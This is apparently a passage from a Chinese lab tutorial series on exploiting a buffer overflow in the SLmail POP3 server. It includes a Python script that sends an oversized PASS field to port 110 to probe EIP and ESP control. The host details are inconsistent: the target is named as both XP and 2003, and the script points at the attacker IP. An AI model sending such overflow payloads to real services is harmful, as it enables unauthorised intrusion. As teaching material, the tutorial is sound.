Kali虚拟机一台(192.168.163.133)
Windows XP虚拟机一台(192.168.163.130)
如何用Kali虚拟机一步一步“黑掉”这个windows2003虚拟机呢?
用到的软件:
SLmail程序(存在缓冲区溢出漏洞)
ImmunityDebugger(调试工具)
mona脚本(配合调试工具使用)
这些在准备工作的文章中有百度网盘下载地址
实验目的:
用Kali虚拟机发送脚本,完成对SLmail程序的缓冲区溢出漏洞的利用
从而获取目标windows机器的最高权限
粗俗来说:黑了这个windows机器
缓冲区溢出漏洞的概念以及实验准备:
https://www.cnblogs.com/xuyiqing/p/9835561.html
缓冲区溢出实验(漏洞发现):
https://www.cnblogs.com/xuyiqing/p/9849072.html
接着上篇文章:
上次以及精确定位到EIP在2606位置
那么是否可以修改ESP寄存器呢?
如何确认ESP寄存器的大小呢?
写一个小脚本:
#!/usr/bin/python import socket buffer = 'A' * 2606 + 'B' * 4 + 'C' * (3500 - 2606 - 4) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print "\nSending evil buffer...\n" s.connect(('192.168.163.133', 110)) data1 = s.recv(1024) s.send('USER test' + '\r\n') data2 = s.recv(1024) s.send('PASS ' + buffer + '\r\n') s.close() print '\nDone' except: print 'Can not connect to POP3'